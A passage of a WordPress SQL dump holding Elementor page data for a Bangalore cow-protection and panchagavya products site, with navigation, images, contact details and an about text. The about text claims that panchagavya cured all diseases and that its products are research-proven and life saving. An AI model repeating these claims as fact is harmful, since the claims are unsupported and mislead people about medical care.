nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10843,1807,'_elementor_page_assets','a:0:{}'),(10845,1808,'_elementor_edit_mode','builder'),(10846,1808,'_elementor_template_type','wp-page'),(10847,1808,'_elementor_version','3.7.8'),(10848,1808,'_wp_page_template','elementor_canvas'),(10849,1808,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10850,1808,'_elementor_page_assets','a:0:{}'),(10853,1809,'_elementor_edit_mode','builder'),(10854,1809,'_elementor_template_type','wp-page'),(10855,1809,'_elementor_version','3.7.8'),(10856,1809,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (10857,1809,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10858,1809,'_elementor_page_assets','a:0:{}'),(10860,1810,'_elementor_edit_mode','builder'),(10861,1810,'_elementor_template_type','wp-page'),(10862,1810,'_elementor_version','3.7.8'),(10863,1810,'_wp_page_template','elementor_canvas'),(10864,1810,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and 